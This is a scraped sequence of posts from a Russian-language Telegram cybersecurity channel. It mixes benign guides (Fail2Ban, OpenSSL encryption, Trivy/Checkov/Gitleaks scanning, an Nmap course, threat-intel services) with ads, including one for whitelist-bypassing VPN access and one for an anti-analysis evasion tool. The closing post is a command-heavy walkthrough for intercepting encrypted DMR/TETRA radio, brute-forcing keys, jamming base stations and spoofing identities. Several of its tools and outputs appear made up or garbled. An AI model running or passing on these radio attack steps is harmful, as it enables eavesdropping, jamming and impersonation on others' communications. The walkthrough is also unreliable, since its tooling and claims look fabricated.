CodeGuard: CyberSec Edition

🤖Обходим «белый список» вместе с STRELKA Думали, что белые списки не обходятся когда глушат интернет? — Как бы не так! Умельцы из STRELKA VPN уже сделали стабильный проход на любые сайты, даже когда их глушат операторы.

Доступ в свободный интернет по цене стаканчика кофе прямо в Телеграм!

Unshackle: полная конфиденциальность для реверс-инжиниринга Статический анализ под угрозой? Современные защитники (VMP, Themida) детектят отладчики и виртуалки по тысяче признаков. Unshackle чистит среду исполнения, делая её "стерильной" для инструментов реверса. Зачем это нужно аналитику

🔴Полный контроль над API ядра: скрывает процессы, драйверы, изменяет тайминги выполнения 🔴Интеграция с Ghidra/x64dbg: позволяет запускать и отлаживать защищённый бинарь в изолированной среде, которая для него выглядит как чистая Windows 🔴Отключает детекты на уровне гипервизора, антиэмуляционные техники и хуки.

👉 Смотрим на GitHub #реверс #безопасность #инструменты #анализ

TELEGRAM — ВСЁ? Уверен, вы уже устали от таких заголовков. РКН активно продвигает MAX, но давайте начистоту: весь качественный IT и AI-контент живет в Telegram. И останется здесь. В MAX существует жесткое ограничение: создать канал могут только авторы с аудиторией от 10 000 подписчиков. Это значит, что 99% экспертов, которые ежедневно делятся реальной практикой, туда просто не попадут. Чтобы вы не потеряли доступ к экспертному контенту, советую каналы, которые читаю сам — Подписаться.

Вайб-кодинг, автоматизация процессов и уроки нейрогенерации — эксперты делятся реальными кейсами на своих каналах.

Подпишитесь на экспертов сейчас. К концу весны вы будете благодарны себе за то, что сохранили доступ к этим знаниям. ⏺ Знания в 1 клик — https://t.me/addlist/e4sKaPAmeWVlZTQy

🛡 osint.tools: коллекция инструментов для OSINT osint.tools - это открытый и постоянно пополняемый каталог онлайн-инструментов для разведки на основе открытых источников (OSINT). Сайт помогает исследователям, пентестерам и журналистам быстро находить нужные сервисы для сбора и анализа информации. ⚙️ Ключевые возможности каталога:

▶️Структурированная категоризация инструментов (соцсети, метаданные, домены и т.д.) ▶️ Поиск по всем инструментам с фильтрами ▶️ Возможность добавления новых инструментов сообществом ▶️ Регулярные обновления и проверка работоспособности ссылок ▶️ Подробные описания и примеры использования для многих сервисов

⚡️Примеры использования osint.tools: Поиск инструмента для конкретной задачи:

1. Перейти на osint.tools
2. Выбрать категорию (например, "Social Media")
3. Найти нужный сервис (например, для анализа Twitter)

Добавление нового инструмента в каталог:

1. Нажать "Submit Tool" на сайте
2. Заполнить форму (название, ссылка, категория, описание)
3. После проверки модератором инструмент появится в каталоге

Эффективный поиск через встроенную строку:

Используйте ключевые слова:
- "email search"
- "username"
- "image analysis"
- "phone number"

😈 CodeGuard | Chat

🔍 Fail2Ban NG: автоматическая защита серверов от брутфорса Fail2Ban NG — это обновлённая версия классического инструмента защиты от атак по паролям, созданная для автоматического реагирования на подозрительную активность в логах. Она анализирует системные журналы и динамически блокирует IP‑адреса, совершающие неудачные входы или подозрительные запросы. В отличие от стандартных средств firewall, Fail2Ban NG работает с шаблонами событий и умеет адаптироваться под любую систему журналирования — от SSH и Nginx до SMTP и Docker. ⚙️ Ключевые возможности Fail2Ban NG:

▶️Мониторинг логов в режиме реального времени ▶️Поддержка кастомных фильтров и регулярных выражений ▶️Интеграция с iptables, nftables, ufw и firewalld ▶️Поддержка оповещений через Telegram, email или вебхуки ▶️Автоматические действия: ban, unban, rate‑limit, alert

⚡️Быстрый старт с Fail2Ban: Установка:

sudo apt install fail2ban
sudo systemctl enable --now fail2ban

Проверка работы:

sudo fail2ban-client status
sudo fail2ban-client status sshd

🟢Добавь свой jail‑файл в /etc/fail2ban/jail.local 🟢 Настрой фильтры в /etc/fail2ban/filter.d/ 🟢 Отслеживай метрики заблокированных IP и длительность блокировок

➡️ Репозиторий GitHub 😈 CodeGuard | Chat

«Атаки носят массовый характер»: аналитический отчет по DDoS за 2025 год

Отчет «Атаки носят массовый характер: аналитический отчет по DDoS за 2025 год», подготовленный Антоном Ведерниковым (Selectel), посвящен анализу распределённых атак типа DDoS, зафиксированных в 2025 году с помощью бесплатного сервиса защиты Selectel. Он представляет собой обзор динамики, масштабов и характеристик DDoS‑угроз, направленных против облачной инфраструктуры клиентов компании.

➡️ Статья/Отчет 😈 CodeGuard | Chat

🔐 Шпаргалка: шифрование файлов в OpenSSL 1️⃣Симметричное шифрование (простой способ)

openssl enc -aes-256-cbc -salt -in secret.txt -out secret.enc
# Расшифровка
openssl enc -d -aes-256-cbc -in secret.enc -out secret.txt

Пароль спросит. Запиши его, иначе файл - мусор. 2️⃣ Генерация ключей (асимметричное)

# Закрытый ключ
openssl genrsa -out private.key 4096
# Публичный ключ
openssl rsa -in private.key -pubout -out public.key

Храни private.key как зеницу ока. public.key можно всем раздать. 3️⃣ Шифрование файла публичным ключом

openssl rsautl -encrypt -pubin -inkey public.key -in plain.txt -out encrypted.bin

Расшифрует только владелец private.key. 4️⃣ Подпись файла (чтобы знать, что не подменили)

openssl dgst -sha256 -sign private.key -out signature.sig plain.txt
# Проверка подписи
openssl dgst -sha256 -verify public.key -signature signature.sig plain.txt

5️⃣ Шифрование больших файлов гибридным способом

# Генерируем случайный ключ для AES
openssl rand -base64 32 > key.bin
# Шифруем файл этим ключом
openssl enc -aes-256-cbc -salt -in bigfile.iso -out bigfile.enc -pass file:key.bin
# Ключ шифруем RSA публичным ключом
openssl rsautl -encrypt -pubin -inkey public.key -in key.bin -out key.enc

Отправляй bigfile.enc и key.enc. Получатель расшифрует key.enc своим приватным ключом, потом им же bigfile.enc. 6️⃣ Проверка целостности после расшифровки

openssl sha256 decrypted_file.iso
# Сравни хеш с оригиналом, если он был

⚠️ Важные моменты

# Удаляй временные ключи
shred -u key.bin
# Правильные права
chmod 600 private.key
# Старые алгоритмы - говно
# Используй AES-256-GCM если поддерживается

✅ Быстрая команда для отправки

tar cz secret_dir | openssl enc -aes-256-cbc -pbkdf2 -out archive.tar.enc

Отправляй archive.tar.enc и пароль другим каналом. Делай так и твои файлы не прочитает никто, кроме тебя. Всё остальное - фигня. 😈 CodeGuard | Chat

Программисты, это вам 👇 Держите 5 каналов, которые реально помогают изучать программирование и IT с полного нуля: 🖥 Easy Coder — все направления IT. 👩‍💻 Easy Python — всё о Python. 🌐 Easy WebDev — Frontend, Backend. 🔠 Easy InfoSec — ИБ, Хакинг. 🖥 Easy GitHub — лучшее с GitHub. Тонны бесплатной инфы для любого уровня подготовки ✔️

Bash и кибербезопасность: отрезвляющая правда о командной строке 📖 Когда сервер горит, а GUI зависла, пентестер с тремя строками bash решает инцидент быстрее, чем команда с графическими сканерами вообще загрузит интерфейс. Вот в чём суть этой книги. Что внутри:

🔵Основы без воды — регулярные выражения, переменные, работа с потоками данных (stdin/stdout/stderr), и как это всё связано с безопасностью 🔵Защита данных в реальном времени — сбор данных для упреждающей защиты, парсинг и анализ логов, мониторинг сетей без "умных" инструментов, анализ вредоноса 🔵Пентест от командной строки — обфускация скриптов, фаззинг, инструменты для удалённого доступа, всё через bash 🔵Администрирование с безопасностью - управление пользователями, группами, пермишенами, инвентаризация устройств и софта, аудит систем

Для кого это:

🔴Security операторов и analysts — которые расследуют инциденты в логах, не имея ничего, кроме bash 🔴Пентестеров и разработчиков exploit'ов — кто знает, что на целевой системе может быть только sh/bash 🔴Системных администраторов — буквально каждый день сталкиваются с необходимостью парсить и обрабатывать кучу текстовых данных 🔴Начинающих в IT-безопасности — кто хочет понять, как работают высокоуровневые инструменты под капотом

💠 Качай книгу → [Archive] 😈 CodeGuard | Chat

😻Где искать жену айтишнику: нетворкинг, а не тиндер Проблема не в тебе, а в окружении. Сидишь в офисе 10 часов, твой круг общения - бородатые коллеги. Надо вылазить из скорлупы, но с умом. Тратить время на дебильные свидания вслепую - бесполезная хрень. 1️⃣Идем туда, где водятся единомышленницы Не в бар. Иди туда, где тебе комфортно и где твои интересы.

- IT-митапы и конференции (да, там тоже есть девушки).
- Хакатоны по смежным темам (дизайн, маркетинг, data science).
- Клубы по настолкам, квизам, стендапу.
- Курсы (языковые, танцевальные, кулинарные).

Твоя задача - не «очаровать», а быть собой в своей среде. Общие интересы - лучший фундамент. 2️⃣Прокачивай софт-скиллы, а не только хард

Умение слушать > умение рассказать про новый фреймворк.
Искренний интерес к человеку > заученные пикап-фразы.
Нормальный диалог > монолог про сложности продакшна.

Твоя работа - это 20% разговора, не больше. Спроси про её увлечения, проекты, мечты. 3️⃣Используй профессиональные сети правильно LinkedIn, Хабр Карьера, телеграм-сообщества. Ищи не вакансии, а людей.

# Не пиши «привет, симпатичная аватарка, давай встретимся».
# Пиши: «Вижу, вы занимались проектом по NLP, я тоже в теме, есть вопрос/идея».
# Переходи от профессионального к личному постепенно.

4️⃣Попроси друзей и коллег Это не стыдно. Четко сформулируй, кого ищешь.

«Ребят, ищу девушку умную, с юмором, возможно из смежной IT-сферы.
Если знаете кого-то - представьте, я адекватный».

Сарафанное радио работает. Но будь готов, что тебя тоже будут проверять. 5️⃣Готовь почву: соцсети и внешний вид

- Фото не только с монитором. Добавь хобби, путешествия.
- Одежда не из «мерча гугла». Базовый стиль - уже хорошо.
- Чистая квартира на случай, если пригласишь. Без городов из банок от колы.

6️⃣Первый выход «в поле»

Цель: не найти жену за вечер.
Цель: познакомиться с 3 новыми людьми, обменяться контактами с 1.
Без давления. Будь открытым, а не отчаянным.

✅ Что не делать:

- Не своди всё к деньгам и зарплате.
- Не ной про работу и усталость.
- Не пытайся произвести впечатление заумными терминами.
- Не делай «последний шанс» из каждой встречи.

💥Итог: перестань искать «жену». Ищи интересного человека в среде, где тебе хорошо. Остальное приложится. 😈 CyberSec Edition | Чат

Знакомство с Nmap (CyberSecurity) + Компьютерные сети 🌐 Этот курс посвящён работе с Nmap — одним из самых популярных инструментов для сканирования сетей и оценки их безопасности. Мы научимся устанавливать Nmap на Kali Linux, разберём основные команды и синтаксис, освоим базовые техники сканирования. Чему вы научитесь:

🔻Устанавливать и настраивать Nmap на Kali Linux. 🔻Понимать, что такое порты, IP-адреса и как они связаны с сетями. 🔻Использовать базовые команды Nmap для сканирования одного устройства 🔻Определять открытые порты и анализировать, какие службы работают на хостах. 🔻Узнавать версии сервисов и операционные системы устройств. 🔻Выучите базовые знания по компьютерным сетям.

👩‍💻 Проходим курс здесь 😈 CyberSec Edition | Чат

Уйти из найма и работать удалённо на себя? Звучит как план на понедельник, но к четвергу отпускает. Я ни дня своей жизни не проработал «на дядю» — зато построил десятки собственных проектов и вывел их на монетизацию. Где-то стрельнуло, где-то прогорел, никакого инфоцыганства, только личный опыт и практика со всеми взлётами и падениями. У себя в блоге «айти на миллиард» пишу:

– Как находить идеи? – Как быстро запускать MVP? – Как привлекать первых пользователей?

Если тебе близка айти-сфера и ты давно хочешь создать свой пет-проект, нам по пути: https://t.me/+aQLG0hRQqlI5YjAy

🔐 CyberSec: топ инструментов для анализа угроз и киберзащиты Если нужно провести анализ атак, угроз, вредоносных файлов или инфраструктуры — вот лучшие сервисы и платформы для специалистов по безопасности:

Hybrid Analysis — динамический анализ образцов и отчетов о вредоносных файлах Any.Run — интерактивная песочница для анализа вредоносов MALPEDIA — база данных известных семейств вредоносных программ AbuseIPDB — проверка IP-адресов на подозрительную активность ThreatFox — индикаторы компрометации (IOC) из открытых источников URLScan — быстрая проверка сайтов на фишинг, редиректы и вредное содержимое Talos Intelligence — база данных киберугроз от Cisco Have I Been Pwned — проверка email-адресов на утечки PhishTank — репозиторий фишинговых сайтов DNSDumpster — разведка инфраструктуры DNS SecurityTrails — полные данные о доменах, IP и серверах Metadefender Cloud — анализ файлов и метаданных на угрозы Intezer Analyze — генетический анализ кода для выявления сходств между вредоносами

😈 CyberSec Edition | Чат

🎓 Видео, которое раскладывает интернет по полочкам Все мы пользуемся сетью каждый день — но что на самом деле происходит, когда ты открываешь сайт или отправляешь сообщение? Если хочется понять архитектуру интернета по-настоящему, без хаоса и догадок — вот отличное видео: «Архитектура интернета и веба» Автор спокойно и системно объясняет, из чего построен интернет:

🔸 Кабели, дата-центры и маршрутизация 🔸 Протоколы TCP/IP, DNS, HTTP 🔸 Безопасность соединений, TLS и HTTPS 🔸 WebSockets и реальное взаимодействие в сети 🔸 Балансировка нагрузки, CDN и масштабирование

📘После просмотра у тебя будет картинка целиком — от физики до прикладного уровня. 📱 Само видео на YouTube 😈 CyberSec Edition | Чат

🔒 Секретный ИБ-канал от девушки-спеца! Алена | 6 лет в инфобезе Разбираю уязвимости, пентест, OSINT. Плюс — работа с госструктурами и социалка. Только мясо без воды: ❤️ Инструменты защиты ❤️ Госслужбы: реальные кейсы ❤️ ИБ + благотворительность ❤️ Практика для админов Технологии защищают добро. Честно, полезно, по делу! ⬇️ Присоединяйся к ИБ-комьюнити

5 инструментов, которые убивают границу между ИБ и DevOps ⌨️ DevOps гонит фичи, ИБ кричит "стой". А потом приходит пентестер и всем становится грустно. Вот инструменты, которые заставят их говорить на одном языке, а не орать матом. 1️⃣Trivy - сканер уязвимостей, который не тормозит пайплайн

# Впихнули в CI/CD за 2 минуты:
- name: Scan image
  uses: aquasecurity/trivy-action@master
  with:
    image-ref: 'myapp:latest'
    format: 'sarif'
    output: 'trivy-results.sarif'

# Или локально для контейнера, файлов, k8s:
trivy image myapp:latest
trivy fs --security-checks vuln,secret,config .
trivy k8s --report summary cluster

Зачем: Находит CVE в образах, секреты в коде и косяки в конфигах k8s. Быстро. Без этой хрени с ручными отчётами. 2️⃣Checkov - инфраструктура как код под прицелом

# Терраформ, CloudFormation, K8s манифесты:
checkov -d /path/to/tf/code
checkov --file deployment.yaml

# Пример выхлопа:
CKV_AWS_21: FAIL
Resource: aws_s3_bucket.my_bucket
Guide: https://docs.bridgecrew.io/docs/s3_ensure_all_public_access_blocked
28 |   versioning {
29 |     enabled = true
30 |   }
31 | }

Фикс в логе: Показывает, какое правило сработало и как исправить. IaC-безопасность на автомате. 3️⃣Grype - от Anchore, тупо сканирует SBOM

# Сгенерировал SBOM через Syft -> просканировал через Grype:
syft myapp:latest -o json > sbom.json
grype sbom:sbom.json

# Или прямо образ:
grype myapp:latest --fail-on high

Суть: Работает с "меню компонентов" (SBOM) твоего софта. Узнал, из чего собрано, - нашёл в нём дыры. 4️⃣GitLeaks - чтобы ключи от облака не утекли в публичный репозиторий

# Пре-коммит хук или в пайплайне:
gitleaks detect --source . -v
# Найдёт: AWS_ACCESS_KEY_ID, slack token, приватные ssh ключи.

# Или как хук:
gitleaks protect -v --staged

Зачем: Потому что каждый дебильный коммит с .env файлом - это потенциальный бан аккаунта в AWS. Предотвращает, а не констатирует. 5️⃣Kube-bench - чекер, что k8s настроен не как попало

# Запускается внутри пода или на ноде:
kube-bench node --version 1.28
kube-bench master --version 1.28

# Вывод:
[FAIL] 1.1.12 Ensure that the etcd data directory permissions are set to 700 or --etcd-certfile and --etcd-keyfile are set as appropriate (Automated)

Суть: Автоматически проверяет кластер на соответствие CIS Benchmark для Kubernetes. Не гадай, безопасно ли - запусти и узнай. Бонус: одна команда для параноика

#!/bin/bash
echo "🔍 IaC/Container Security Quick Scan"
checkov -d . --quiet
trivy image --severity HIGH,CRITICAL $(cat Dockerfile | grep FROM | cut -d' ' -f2)
gitleaks detect --source . --no-banner
echo "Если всё чисто - сегодня можно спать."

Интересный факт: По данным 2024, в 70% случаев утечка данных происходит из-за мисконфигурации (S3 bucket public, открытый порт), а не из-за сложной 0-day атаки. Автоматизируй проверку конфигов. 😈 CyberSec Edition | Чат

Подслушивание защищённых радиоволн: как сломать цифровую блядскую безопасность Их «защищённые» рации шифруют голос? А если я скажу, что цифровой DMR/Mototrbo/TETRA можно декодировать и слушать? SDR + пара тулов делают из секретных переговоров открытый эфир. 1️⃣ В чём суть Цифровые стандарты (DMR, dPMR, NXDN, TETRA) передают голос как поток данных. Без ключа - это шум. Но если система сломана (слабый крипто, дефолтные ключи, уязвимости) - можно декодировать в реальном времени. 2️⃣ Полная практика

# 1. Перехват сигнала (SDR - RTL-SDR)
rtl_fm -f 446.00625M -s 48k -g 50 -l 0 -E deemp -M fm -A fast -r 48k

# 2. Запись сырого потока для анализа
rx_sdr -f 446M -s 2.4M -g 40 - > iq_sample.raw

# 3. Декодирование DMR через DSD+
dsdplus -fa -i /dev/ttyACM0 -o /dev/stdout | aplay -r 48000 -f S16_LE -t raw -c 1

# 4. Анализ пакетов TETRA (Airprobe/GRC)
airprobe_rtlsdr.py -f 410M -s 2M -g 40 -n 1000000

# 5. Брут ключа шифрования (RC4/AES слабые реализации)
tetra-krack --pcap capture.pcap --wordlist keys.txt --verbose

3️⃣ Что можно получить

[DMR] Slot1: TG=1001 | Source=7001 | Enc=Off
[TETRA] Call Setup: Group 5501 ← Слушаем канал!
[NXDN] Voice Frame Decoded: KeyID=1 (Default)
[WARNING] Encryption RC4-40 detected → Weak

4️⃣ Продвинутые фишки

# Генерация ключа TETRA по известным данным
tetra-crypto --known-keystream keystream.bin --derive-key

# Атака на синхронизацию TETRA (DoSSS)
tetra-dos --frequency 410M --power 30 --duration 60

# Подмена BSI (Base Station Identity) в DMR
dmr-spoof --target-tg 9999 --source-id 7000 --play audio.wav

5️⃣ Нюансы

🔸 Только свой диапазон/частоты (433-446 МГц без лицензии) 🔸 Шифрование TEA1/TEA2 в TETRA - держится на гостайне 🔸 DMR с AES-128 и рандомными ключами - почти не ломается 🔸 Ловим отражённый сигнал за 5 км (параболическая антенна)

Полезно? ❤️ — Да 👍 — Нет 😈 CyberSec Edition | Чат